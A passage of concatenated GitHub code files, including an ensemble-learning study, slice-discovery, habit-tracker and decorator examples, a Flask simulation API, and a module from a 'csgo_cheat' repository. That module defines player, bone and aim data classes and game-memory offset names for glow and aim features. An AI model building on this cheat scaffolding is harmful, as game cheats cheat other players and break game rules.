único\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n#Importação do pacote que divide a base em teste e treino\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.metrics import f1_score\r\n\r\nroot = 'bases'\r\nextension = '.csv'\r\n\r\nfor subdir, dirs, files in os.walk(root):\r\n for file in files:\r\n\r\n evaluation = {} 
\r\n\r\n #Lê a base de dados para o dataframe\r\n data = pd.read_csv(os.path.join(subdir, file))\r\n label = data.iloc[:, -1:]\r\n attri = data.iloc[:,:-1]\r\n \r\n #divide a base em teste e treino\r\n skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=0)\r\n skf.get_n_splits(attri,label)\r\n \r\n #KNeighborsClassifier\r\n knn = KNeighborsClassifier()\r\n print('knn')\r\n\r\n\r\n #Support Vector Machine\r\n svm = SVC()\r\n print('svc')\r\n\r\n #Decision Tree\r\n dt = DecisionTreeClassifier()\r\n print('dt')\r\n\r\n #Neural Network\r\n nn = MLPClassifier()\r\n print('nn')\r\n\r\n #Naive Bayes\r\n nb = GaussianNB()\r\n print('nn')\r\n\r\n \r\n #Bagging\r\n bagging_knn = BaggingClassifier(knn)\r\n bagging_svm = BaggingClassifier(svm)\r\n bagging_dt = BaggingClassifier(dt)\r\n bagging_nn = BaggingClassifier(nn)\r\n bagging_nb = BaggingClassifier(nb,)\r\n\r\n\r\n #Boosting\r\n boosting_svm = AdaBoostClassifier(svm, algorithm='SAMME')\r\n boosting_dt = AdaBoostClassifier(dt)\r\n boosting_nb = AdaBoostClassifier(nb)\r\n\r\n #Stacking - Define os classificadores base\r\n estimators = [\r\n ('knn',knn),\r\n ('svm',svm),\r\n ('dt',dt),\r\n ('nn',nn),\r\n ('nb',nb)\r\n ]\r\n\r\n #define o meta-classificador\r\n stacking_knn = StackingClassifier(estimators=estimators, final_estimator=knn)\r\n stacking_svm = StackingClassifier(estimators=estimators, final_estimator=svm)\r\n stacking_dt = StackingClassifier(estimators=estimators, final_estimator=dt)\r\n stacking_nn = StackingClassifier(estimators=estimators, final_estimator=nn)\r\n stacking_nb = StackingClassifier(estimators=estimators, final_estimator=nb)\r\n \r\n for train_index,test_index in skf.split(attri,label):\r\n attri_train = attri.iloc[train_index]\r\n attri_test = attri.iloc[test_index] \r\n \r\n label_train = label.iloc[train_index].values.ravel()\r\n label_test = label.iloc[test_index].values.ravel()\r\n\r\n #Treina os classificadores de único aprendizado\r\n knn.fit(attri_train,label_train)\r\n svm.fit(attri_train,label_train)\r\n dt.fit(attri_train,label_train)\r\n nn.fit(attri_train,label_train)\r\n nb.fit(attri_train,label_train) \r\n\r\n #Treina os ensemble\r\n bagging_knn.fit(attri_train,label_train)\r\n bagging_svm.fit(attri_train,label_train)\r\n bagging_dt.fit(attri_train,label_train)\r\n bagging_nn.fit(attri_train,label_train)\r\n bagging_nb.fit(attri_train,label_train)\r\n\r\n boosting_svm.fit(attri_train,label_train)\r\n boosting_dt.fit(attri_train,label_train)\r\n boosting_nb.fit(attri_train,label_train)\r\n\r\n stacking_knn.fit(attri_train,label_train)\r\n stacking_svm.fit(attri_train,label_train)\r\n stacking_dt.fit(attri_train,label_train)\r\n stacking_nn.fit(attri_train,label_train)\r\n stacking_nb.fit(attri_train,label_train)\r\n \r\n\r\n #Avalia os classificadores \r\n predictions = knn.predict(attri_test) \r\n evaluation['kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n\r\n predictions = svm.predict(attri_test) \r\n evaluation['SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = dt.predict(attri_test) \r\n evaluation['DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = nn.predict(attri_test) \r\n evaluation['NN Micro_F1'] = f1_score(label_test, predictions, 
average='micro')\r\n evaluation['NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = nb.predict(attri_test) \r\n evaluation['NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_knn.predict(attri_test) \r\n evaluation['Bagging_kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_svm.predict(attri_test) \r\n evaluation['Bagging_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_dt.predict(attri_test) \r\n evaluation['Bagging_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_nn.predict(attri_test) \r\n evaluation['Bagging_NN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_nb.predict(attri_test) \r\n evaluation['Bagging_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = boosting_svm.predict(attri_test) \r\n evaluation['Boosting_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = boosting_dt.predict(attri_test) \r\n evaluation['Boosting_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = boosting_nb.predict(attri_test) \r\n evaluation['Boosting_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_knn.predict(attri_test) \r\n evaluation['Stacking_kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_svm.predict(attri_test) \r\n evaluation['Stacking_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_dt.predict(attri_test) \r\n evaluation['Stacking_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_nn.predict(attri_test) \r\n evaluation['Stacking_NN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_nb.predict(attri_test) \r\n evaluation['Stacking_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n results = pd.DataFrame([evaluation])\r\n 
results.to_csv(\"results_\"+file)","repo_name":"luscafidelis/ensemble-study","sub_path":"estudo-ensemble.py","file_name":"estudo-ensemble.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36293374082","text":"import threading\nfrom typing import List, Tuple\n\nfrom utils import get_windows_location\n\n\nclass Bone:\n \"\"\"骨骼节点\"\"\"\n\n def __init__(\n self, body: List[float], head: List[float],\n highest: List[float] = None, lowest: List[float] = None,\n l_feed: List[float] = None, r_feed: List[float] = None,\n ):\n self.body = body # 腰部身体节点\n self.head = head # 头节点\n self.highest = highest # 最高处节点\n self.lowest = lowest # 最低处节点\n self.l_feed = l_feed # 左脚节点\n self.r_feed = r_feed # 右脚节点\n\n\nclass Player:\n \"\"\"玩家\"\"\"\n _single_lock = threading.Lock()\n _instance = {}\n\n def __new__(cls, *args, **kwargs):\n if args:\n _entity = args[0]\n else:\n _entity = kwargs.get('entity')\n cls_ = cls._instance.get(_entity)\n if not cls_:\n with cls._single_lock:\n if not cls_:\n cls_ = super(Player, cls).__new__(cls)\n cls._instance[_entity] = cls_\n\n return cls_\n\n def __init__(\n self,\n entity: int,\n team_id: int,\n effective: bool = True,\n is_self: bool = False,\n location: tuple = None,\n healthy_blood: int = 100,\n armor: int = 100,\n bone: Bone = None,\n aim_len: int = 9999,\n squat: float = 0.0,\n screen: Tuple[float, float] = None,\n ):\n self.entity = entity # 人物矩阵地址\n self.team_id = team_id # 队伍id\n self.effective = effective\n self.is_self = is_self # 是否为自己\n self.location = location # 位置\n self.healthy_blood = healthy_blood # 血量\n self.armor = armor # 盔甲\n self.bone: Bone = bone # 骨骼\n self.aim_len = aim_len # 自瞄距离\n self.squat = squat # squat\n self.screen = screen # 屏幕坐标\n\n def __str__(self):\n return \"Player(0X%x->{team:%s, self:%s, location:%s, blood:%s, armor:%s})\" % (\n self.entity, self.team_id, self.is_self, self.location, self.healthy_blood, self.armor\n )\n\n __repr__ = __str__\n\n\nclass WindowsInfo:\n \"\"\"监听屏幕\"\"\"\n x, y, w, h = get_windows_location()\n\n\nclass Signature:\n \"\"\"特征值\"\"\"\n dwClientState: int\n dwEntityList: int\n dwViewMatrix: int\n dwLocalPlayer: int\n m_iTeamNum: int\n m_iHealth: int\n m_iGlowIndex: int\n m_vecOrigin: int\n m_ArmorValue: int\n m_iShotsFired: int\n m_dwBoneMatrix: int\n m_aimPunchAngle: int\n m_vecViewOffset: int\n dwGlowObjectManager: int\n dwClientState_ViewAngles: int\n\n\nclass Team:\n \"\"\"队伍阵营\"\"\"\n ct: int = 3\n t: int = 2\n","repo_name":"ItGarbager/csgo_cheat","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40666063298","text":"from __future__ import annotations\nfrom typing import Union\nfrom domino._slice.abstract import Slicer\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn.functional import cross_entropy\nimport torch\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, Lasso\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tqdm import tqdm\nimport numpy as np\nimport meerkat as mk\n\nfrom ..utils import convert_to_torch, unpack_args, convert_to_numpy\n\n\nclass FusedSlicer(Slicer, nn.Module):\n def __init__(\n self,\n n_slices: int = 5,\n candidate_text: mk.DataFrame = None,\n text_column: Union[str, np.np.ndarray] = \"text\",\n text_embedding_column: Union[str, np.np.ndarray] = 
\"embedding\",\n device: Union[int, str] = \"cpu\",\n ):\n super().__init__(n_slices=n_slices)\n self.candidate_text, self.candidate_text_embeddings = unpack_args(\n candidate_text, text_column, text_embedding_column\n )\n (self.candidate_text_embeddings,) = convert_to_torch(\n self.candidate_text_embeddings\n )\n\n self.candidate_text_embeddings = self.candidate_text_embeddings\n\n self.device = device\n\n self.text_idxs = None\n self.text_embeddings = None\n self.text = None\n\n def _prepare_embs(self, *args):\n return [inp.to(device=self.device, dtype=torch.float) for inp in args]\n\n def fit(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n ) -> FusedSlicer:\n embeddings, targets, pred_probs = unpack_args(\n data, embeddings, targets, pred_probs\n )\n (embeddings,) = convert_to_torch(embeddings)\n targets, pred_probs = convert_to_numpy(targets, pred_probs)\n embeddings, candidate_text_embeddings = self._prepare_embs(\n embeddings, self.candidate_text_embeddings\n )\n with torch.no_grad():\n slice_scores = torch.matmul(embeddings, candidate_text_embeddings.T)\n\n slice_scores = slice_scores.cpu().numpy()\n\n l = targets - pred_probs\n\n #slice_scores = MinMaxScaler().fit_transform(slice_scores)\n lr = Ridge(normalize=True).fit(slice_scores, l) # Change this back!!!!\n\n coef = lr.coef_.squeeze()\n self.text_idxs = np.concatenate(\n [\n #np.argsort(coef)[: self.config.n_slices],\n np.argsort(-np.abs(coef))[: self.config.n_slices]\n ]\n )\n\n self.text_embeddings = candidate_text_embeddings[self.text_idxs]\n self.text = self.candidate_text[self.text_idxs]\n self.text_coefs = coef[self.text_idxs]\n\n return slice_scores \n\n def predict(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n losses: Union[str, np.ndarray] = None,\n ):\n return (\n self.predict(data, embeddings, targets, pred_probs, losses) > 0.5\n ).astype(int)\n\n def predict_proba(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n losses: Union[str, np.ndarray] = None,\n ):\n if self.text_embeddings is None:\n raise ValueError(\"Must call `fit` before `predict`.\")\n (embeddings,) = unpack_args(data, embeddings)\n (embeddings,) = convert_to_torch(embeddings)\n (embeddings,) = self._prepare_embs(embeddings)\n slice_scores = torch.matmul(embeddings, self.text_embeddings.T)\n return slice_scores.cpu().numpy()\n\n def describe(\n self,\n text_data: Union[dict, mk.DataFrame] = None,\n text_embeddings: Union[str, np.ndarray] = \"embedding\",\n text_descriptions: Union[str, np.ndarray] = \"description\",\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n num_descriptions: int = 3,\n ):\n output = []\n for pred_slice_idx in range(self.config.n_slices):\n output.append(\n {\n \"pred_slice_idx\": pred_slice_idx,\n \"scores\": [1],\n \"phrases\": [self.text[pred_slice_idx]],\n }\n )\n\n return output\n\n def to(self, *args, **kwargs):\n \"\"\"Intercept to on a device and set the self.device.\"\"\"\n if isinstance(args[0], (int, str, torch.device)):\n self.device = args[0]\n return super().to(*args, 
**kwargs)\n","repo_name":"HazyResearch/domino","sub_path":"domino/_slice/fused.py","file_name":"fused.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"66"} +{"seq_id":"71442749970","text":"\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import MutableMapping\nimport backend.datetime_extension\n\nclass Habit:\n \"\"\"\n Stores information about a habit, including the name, how frequently it needs\n to be completed, whether it has been completed or not, and its unique id.\n\n @author Team 1\n @version Spring 2022\n \"\"\"\n _name: str\n _id: int\n _reset_date: datetime\n _frequency: int\n\n def __init__(self, name: str, frequency: int, id: int):\n \"\"\"\n Creates a new Habit object with a specified name, frequency, and id.\n\n Precondition: isinstance(name, str) and\n not str.isspace(name) and\n isinstance(frequency, int) and\n frequency >= 0 and\n frequency <= 2 and\n isinstance(id, int)\n Postcondition: self.name == name and\n self.frequency == frequency and\n self.id == id\n \n Params - name: The name of the Habit.\n frequency: How frequently the habit should be completed.\n id: The habit's unique identifier.\n Return - None\n \"\"\"\n EPOCH_TIME = 30256871\n\n self.name = name\n self.frequency = frequency\n self._id = id\n self._reset_date = datetime.fromtimestamp(EPOCH_TIME)\n\n def complete(self) -> bool:\n \"\"\"\n Completes the habit, returning whether the habit was already complete.\n\n Precondition: None\n Postcondition: self.is_complete\n\n Params - None\n Return - [True] iff the habit was not already complete, otherwise [False]\n \"\"\"\n if self.is_complete:\n return False\n\n if self.frequency == CompletionFrequency.DAILY.value:\n self._reset_date = backend.datetime_extension.tomorrow()\n elif self.frequency == CompletionFrequency.WEEKLY.value:\n self._reset_date = backend.datetime_extension.next_sunday()\n else:\n self._reset_date = backend.datetime_extension.first_of_next_month()\n\n return True\n\n def create_json_dict(self) -> MutableMapping:\n return {\n \"name\": self._name,\n \"id\": self._id,\n \"frequency\": self._frequency,\n \"is_complete\": self.is_complete\n }\n\n @property\n def is_complete(self) -> bool:\n \"\"\"\n Gets whether the habit is complete or not.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - [True] if the Habit is complete, otherwise [False].\n \"\"\"\n return datetime.now() < self._reset_date\n\n @property\n def name(self) -> str:\n \"\"\"\n Gets the name of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The name of the habit.\n \"\"\"\n return self._name\n \n @property\n def id(self) -> int:\n \"\"\"\n Gets the id of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The id of the habit.\n \"\"\"\n return self._id\n\n @property\n def frequency(self) -> int:\n \"\"\"\n Gets the frequency of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The frequency of the habit.\n \"\"\"\n return self._frequency\n \n @name.setter\n def name(self, name: str):\n \"\"\"\n Sets the name of the habit.\n\n Precondition: isinstance(name, str) and\n not str.isspace(name)\n Postcondition: self.name == name\n\n Params - name: The new name.\n Return - None\n \"\"\"\n if not isinstance(name, str):\n raise Exception(\"name must be a str\")\n if str.isspace(name):\n raise Exception(\"name must not be blank\")\n\n self._name = 
name\n\n @frequency.setter\n def frequency(self, frequency: int):\n \"\"\"\n Sets the name of the habit.\n\n Precondition: isinstance(name, int) and\n frequency >= 0 and\n frequency <= 2\n Postcondition: self.name == name\n\n Params - name: The new name.\n Return - None\n \"\"\"\n if not isinstance(frequency, int):\n raise Exception(\"frequency must be an int\")\n if frequency < CompletionFrequency.DAILY.value or frequency > CompletionFrequency.MONTHLY.value:\n raise Exception(\"frequency must be between 0 and 2, inclusive\")\n\n self._frequency = frequency\n\nclass CompletionFrequency(Enum):\n DAILY: int = 0\n WEEKLY: int = 1\n MONTHLY: int = 2\n","repo_name":"JACorley1/UWG-SE2-Spring22-Team1","sub_path":"server/backend/habit.py","file_name":"habit.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27437931669","text":"# -*- coding: utf-8 -*-\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef node(l1, l2):\n length1, length2 = 0, 0\n # 求两个链表长度\n while l1.next:\n l1 = l1.next # 尾节点\n length1 += 1\n while l2.next:\n l2 = l2.next # 尾节点\n length2 += 1\n\n # 如果相交\n if l1.next == l2.next:\n # 长的链表先走\n if length1 > length2:\n for _ in range(length1 - length2):\n l1 = l1.next\n return l1 # 返回交点\n else:\n for _ in range(length2 - length1):\n l2 = l2.next\n return l2 # 返回交点\n # 如果不相交\n else:\n return\n","repo_name":"SulphurFH/NoteBook","sub_path":"Interview/15_cross_lint.py","file_name":"15_cross_lint.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18861921224","text":"#!/usr/bin/env python3\n\"\"\"Functional Python Programming\n\nChapter 11, Example Set 1\n\"\"\"\nimport math\n\nfrom functools import wraps\ndef nullable( function ):\n @wraps(function)\n def null_wrapper( arg ):\n return None if arg is None else function(arg)\n return null_wrapper\n\n@nullable\ndef nlog( x ):\n return math.log(x)\n\n@nullable\ndef nround4( x ):\n return round(x,4)\n\ntest_Null_Log= \"\"\"\n>>> nlog = nullable( math.log )\n>>> some_data = [ 10, 100, None, 50, 60 ]\n>>> scaled = map( nlog, some_data )\n>>> [nround4(v) for v in scaled]\n[2.3026, 4.6052, None, 3.912, 4.0943]\n\n\"\"\"\n\nnlog = nullable( math.log )\nnround4= nullable( lambda x: round(x,4) )\n\ntest_Null_Log2= \"\"\"\n>>> some_data = [ 10, 100, None, 50, 60 ]\n>>> scaled = map( nlog, some_data )\n>>> [nround4(v) for v in scaled]\n[2.3026, 4.6052, None, 3.912, 4.0943]\n\"\"\"\n\ndef null2( function ):\n @wraps(function)\n def null_wrapper( *arg, **kw ):\n try:\n return function( *arg, **kw )\n except TypeError as e:\n if 'NoneType' in e.args[0]:\n return None\n raise\n return null_wrapper\n\ntest_null2= \"\"\"\n>>> ndivmod= null2( divmod )\n>>> ndivmod( None, 2 )\n>>> ndivmod( 2, None )\n>>> try:\n... ndivmod( \"22\", \"7\" )\n... except TypeError as e:\n... 
print(e)\nunsupported operand type(s) for divmod(): 'str' and 'str'\n\"\"\"\n\nimport logging, sys\ndef logged( function ):\n @wraps(function)\n def log_wrapper( *args, **kw ):\n log= logging.getLogger(function.__qualname__)\n try:\n result= function( *args, **kw )\n log.info( \"({0!r} {1!r}) => {2!r}\".format(args, kw, result) )\n except Exception as e:\n log.exception( \"({0!r} {1!r})\".format(args, kw) )\n raise e\n return log_wrapper\n\ntest_logged_divmod=\"\"\"\n>>> ldivmod= logged(divmod)\n>>> logging.basicConfig( stream=sys.stdout, level=logging.INFO )\n>>> try: # doctest: +ELLIPSIS\n... ldivmod( 3, None )\n... except Exception:\n... pass\nERROR:divmod:((3, None) {})\nTraceback (most recent call last):\n...\nTypeError: unsupported operand type(s) for divmod(): 'int' and 'NoneType'\n>>> ldivmod( 22, 7 )\nINFO:divmod:((22, 7) {}) => (3, 1)\n\"\"\"\n\nimport decimal\ndef bad_data( function ):\n @wraps(function)\n def wrap_bad_data( text, *args, **kw ):\n try:\n return function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= text.replace(\",\",\"\")\n return function( cleaned, *args, **kw )\n return wrap_bad_data\n\ntest_bad_data=\"\"\"\n>>> from decimal import Decimal\n>>> bd_int= bad_data( int )\n>>> bd_float= bad_data( float )\n>>> bd_decimal= bad_data( Decimal )\n>>> bd_int( \"13\" )\n13\n>>> bd_int( \"1,371\" )\n1371\n>>> bd_int( \"1,371\", base=16 )\n4977\n>>> bd_float(\"17\")\n17.0\n>>> bd_float(\"1,701\")\n1701.0\n>>> bd_decimal(19)\nDecimal('19')\n>>> bd_decimal(\"1,956\")\nDecimal('1956')\n\"\"\"\n\ndef clean_list( text, char_list ):\n if len(char_list) == 0: return text\n return clean_list( text.replace(char_list[0],\"\"), char_list[1:] )\n\nimport decimal\ndef bad_char_remove( *char_list ):\n def cr_decorator( function ):\n @wraps(function)\n def wrap_char_remove( text, *args, **kw ):\n try:\n return function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= clean_list( text, char_list )\n return function( cleaned, *args, **kw )\n return wrap_char_remove\n return cr_decorator\n\ntest_bad_char_remove=\"\"\"\n>>> from decimal import Decimal\n>>> @bad_char_remove(\"$\", \",\")\n... def currency(text, **kw):\n... return Decimal(text, **kw)\n>>> currency( \"13\" )\nDecimal('13')\n>>> currency( \"$3.14\" )\nDecimal('3.14')\n>>> currency( \"$1,701.00\" )\nDecimal('1701.00')\n\"\"\"\n\ndef then_convert( convert_function ):\n def then_convert_decorator( clean_function ):\n @wraps(clean_function)\n def cc_wrapper( text, *args, **kw ):\n try:\n return convert_function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= clean_function( text )\n return convert_function( cleaned, *args, **kw )\n return cc_wrapper\n return then_convert_decorator\n\ntest_then_convert_1=\"\"\"\n>>> @then_convert(int)\n... def drop_punct(text):\n... return text.replace(\",\",\"\").replace(\"$\",\"\")\n>>> drop_punct(\"1,701\")\n1701\n>>> drop_punct(\"97\")\n97\n>>>\n\"\"\"\n\ntest_then_convert_2=\"\"\"\n>>> def drop_punct(text):\n... 
return text.replace(\",\",\"\").replace(\"$\",\"\")\n>>> drop_punct_int = then_convert(int)(drop_punct)\n>>> drop_punct_int(\"1,701\")\n1701\n>>> drop_punct_int(\"97\")\n97\n>>>\n\"\"\"\n\ndef normalize( mean, stdev ):\n normalize = lambda x: (x-mean)/stdev\n def concrete_decorator( function ):\n @wraps(function)\n def wrapped( data_arg ):\n z = map( normalize, data_arg )\n return function( z )\n return wrapped\n return concrete_decorator\n\ntest_normalize = \"\"\"\n>>> d = [ 2, 4, 4, 4, 5, 5, 7, 9 ]\n>>> from Chapter_4.ch04_ex4 import mean, stdev\n>>> m_d, s_d = mean(d), stdev(d)\n>>> @normalize(m_d, s_d)\n... def norm_list(d):\n... return list(d)\n>>> norm_list(d)\n[-1.5, -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 2.0]\n>>> z = lambda x, m, s: (x-m)/s\n>>> list( z( x, mean(d), stdev(d) ) for x in d )\n[-1.5, -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 2.0]\n\n>>> @normalize(m_d, s_d)\n... def norm_sum(d):\n... return sum(d)\n>>> norm_sum(d)\n0.0\n\n\"\"\"\n\n__test__ = {\n \"test_Null_Log\": test_Null_Log,\n \"test_Null_Log2\": test_Null_Log2,\n \"test_null2\": test_null2,\n \"test_logged_divmod\": test_logged_divmod,\n \"test_bad_data\": test_bad_data,\n \"test_bad_char_remove\": test_bad_char_remove,\n \"test_then_convert_1\": test_then_convert_1,\n \"test_then_convert_2\": test_then_convert_2,\n \"test_normalize\": test_normalize,\n}\n\ndef test():\n import doctest\n doctest.testmod(verbose=1)\n\nif __name__ == \"__main__\":\n test()\n #performace()\n","repo_name":"xhd2015/Python","sub_path":"Functional-Python-Programming/Chapter_11/ch11_ex1.py","file_name":"ch11_ex1.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"20895593428","text":"# https://www.py4e.com/html3/03-conditional\n# Exercise 3.2 Rewrite your pay program using try and except so that your program handles non-numeric input gracefully by printing a message and exiting the program.\n\nhours = input(\"Enter Hours: \")\nrate = input(\"Enter Rate: \")\n\ntry:\n fh = float(hours)\n fr = float(rate)\nexcept:\n print(\"Error, please enter numeric input\")\n quit()\n\nif fh > 40:\n # Overtime\n ovtH = fh - 40\n ovtP = ovtH * (fr * 1.5)\n pay = (40 * fr) + ovtP\nelse:\n # Regular\n pay = fh * fr\n\nprint(\"Pay:\", pay)","repo_name":"Tezcatlipoca0000/my_py4e","sub_path":"exercise_3_2.py","file_name":"exercise_3_2.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14915521753","text":"from flask import jsonify, request\n\nfrom cctwin.api import bp\nfrom cctwin.assets.block.ambient_conditions import AmbientConditions\nfrom cctwin.assets.block.block_output import BlockSimulationOutputSchema, BlockBiddingOutputSchema\nfrom cctwin.assets.block.block_request import BlockBiddingRequest, BlockBiddingRequestSchema, BlockSimulationRequest, \\\n BlockSimulationRequestSchema\nfrom cctwin.helper.helper import get_db_temp_list\nfrom cctwin.twin import block_twin\n\n\n@bp.route('/simulation/simulate', methods=['POST'])\ndef simulate():\n data = request.get_json() or {}\n\n schema = BlockSimulationRequestSchema()\n block_simulation_request: BlockSimulationRequest = schema.load(data)\n\n db = block_simulation_request.ambient_conditions.db[0]\n rh = block_simulation_request.ambient_conditions.rh[0]\n baro = block_simulation_request.ambient_conditions.baro[0]\n\n db_list = get_db_temp_list(db)\n rh_list = [rh for _ in db_list]\n baro_list = [baro for _ in 
db_list]\n\n db_list.insert(0, db)\n rh_list.insert(0, rh)\n baro_list.insert(0, baro)\n\n block_simulation_request.ambient_conditions = AmbientConditions(db_list, rh_list, baro_list)\n\n block_output = block_twin.get_performance(block_simulation_request)\n\n schema = BlockSimulationOutputSchema()\n\n json_dict = schema.dump(block_output)\n\n response = jsonify(json_dict)\n response.status_code = 200\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Headers'] = '*'\n return response\n\n\n@bp.route('/bidding/simulate', methods=['POST'])\ndef prepare_bids():\n data = request.get_json() or {}\n\n schema = BlockBiddingRequestSchema()\n block_bidding_request: BlockBiddingRequest = schema.load(data)\n\n block_bidding_outputs = block_twin.get_data_for_bids(block_twin.create_block_configs(), block_bidding_request)\n\n schema = BlockBiddingOutputSchema()\n json_dict = schema.dump(block_bidding_outputs, many=True)\n\n response = jsonify(json_dict)\n response.status_code = 200\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Headers'] = '*'\n return response\n","repo_name":"ernebrown/NorteIII","sub_path":"cctwin/api/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24718573156","text":"from __future__ import print_function, division\n\nimport sys\ninpath = sys.argv[1]\n\nfrom numpy import *\nimport numpy as np\nimport scipy.io\ndata = scipy.io.loadmat( inpath )\n\nAs = data['A']\nas_ortho = data['a_ortho']\nas_full = data['a_full']\np = data['p'].ravel()\nB = data['B']\n\nif len( sys.argv ) == 3:\n np.savez_compressed( sys.argv[2], p = p, B = B )\n print( \"Saved p,B to:\", sys.argv[2] )\n\nprint( \"Number of flats:\", len(As) )\nprint( \"Ambient dimension:\", As.shape[-1] )\nprint( \"Given flat orthogonal dimension:\", As.shape[1] )\nprint( \"Solution flat dimension:\", B.shape[1] )\n\ntotal_a_deviation = 0.\ntotal_dist = 0.\n\nfor A, a_ortho, a_full in zip( As, as_ortho, as_full ):\n total_a_deviation += np.linalg.norm( A.dot( a_full ) - a_ortho )\n \n AB = np.dot( A, B )\n lh = np.dot( AB.T, AB )\n rh = -np.dot( AB.T, np.dot(A,p) - a_ortho )\n z = np.linalg.lstsq( lh, rh )[0].ravel()\n dist = np.dot( A, p + B.dot(z) ) - a_ortho\n total_dist += np.dot( dist, dist 